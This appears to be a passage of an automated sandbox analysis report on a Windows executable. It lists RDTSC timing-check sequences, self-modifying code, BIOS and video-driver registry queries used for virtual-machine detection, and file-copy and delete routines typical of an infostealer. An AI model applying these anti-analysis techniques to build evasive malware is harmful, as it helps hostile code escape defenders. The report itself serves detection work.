              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A838CA second address: A838D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A838D0 second address: A838D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A838D6 second address: A838E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A838E7 second address: A838ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A838ED second address: A83919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FF7B0C9CD55h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82BC7 second address: A82BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82BCD second address: A82BF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FF7B0C9CD4Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82BF6 second address: A82BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82BFB second address: A82C1A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF7B0C9CD4Fh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push ecx 0x0000000d jg 00007FF7B0C9CD46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82C1A second address: A82C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jmp 00007FF7B0F3BFCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B683 second address: A8B6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FF7B0C9CD55h 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B238 second address: A8B23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B23C second address: A8B242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B1D7 second address: A9B1F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD5h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D7A4 second address: A9D7B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D45A second address: A9D46C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0F3BFCEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F40 second address: AB4F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF7B0C9CD59h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007FF7B0C9CD4Fh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F71 second address: AB4F90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007FF7B0F3BFD2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F90 second address: AB4F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F96 second address: AB4F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5383 second address: AB5387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB577A second address: AB577F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6265 second address: AB626F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF7B0C9CD46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB626F second address: AB629B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF7B0F3BFD2h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jo 00007FF7B0F3BFC6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C4D second address: AB9C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C56 second address: AB9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF7B0F3BFD1h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C73 second address: AB9C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C77 second address: AB9C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C7B second address: AB9C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C81 second address: AB9C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9C87 second address: AB9C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB994C second address: AB995C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF7B0F3BFCAh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB995C second address: AB9962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB9962 second address: AB99A6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7B0F3BFC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007FF7B0F3BFCEh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jns 00007FF7B0F3BFC8h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF7B0F3BFD7h 0x00000022 jnc 00007FF7B0F3BFC6h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC48DC second address: AC48F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF7B0C9CD4Dh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC48F3 second address: AC48F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC48F7 second address: AC48FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7981 second address: AC7987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7987 second address: AC798B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC798B second address: AC79AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD9h 0x00000007 jnp 00007FF7B0F3BFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC79AE second address: AC79B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7EBE second address: AD7ECC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7ECC second address: AD7ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA881 second address: ADA8A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD5h 0x00000007 je 00007FF7B0F3BFDEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF0279 second address: AF0297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF7B0C9CD46h 0x0000000a jmp 00007FF7B0C9CD52h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF134 second address: AEF13A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF13A second address: AEF15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF7B0C9CD57h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF2B1 second address: AEF2B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEFE58 second address: AEFE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0C9CD4Eh 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1863 second address: AF1868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4187 second address: AF4195 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5CC3 second address: AF5CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FF7B0F3BFC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5CD3 second address: AF5CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7AB8 second address: AF7ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7ABE second address: AF7AE3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF7B0C9CD46h 0x00000008 jmp 00007FF7B0C9CD55h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150367 second address: 5150377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0F3BFCCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150377 second address: 51503A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 070E8EEAh 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007FF7B0C9CD51h 0x00000019 pop esi 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51503A3 second address: 51503D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop edx 0x0000000d pushfd 0x0000000e jmp 00007FF7B0F3BFD2h 0x00000013 sbb al, 00000008h 0x00000016 jmp 00007FF7B0F3BFCBh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150477 second address: 5150493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 call 00007FF7B0C9CD4Bh 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150493 second address: 5150497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150497 second address: 51504A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51504A7 second address: 51504AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51504AD second address: 51504B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 86FAF7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 86FBF4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A06402 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A926E4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-26878
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-25696
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006318A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006318A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00633910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00633910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00631269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00631269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00631250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00631250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0063E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00634B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00634B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0063CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006323A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006323A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0062DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00632390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00632390
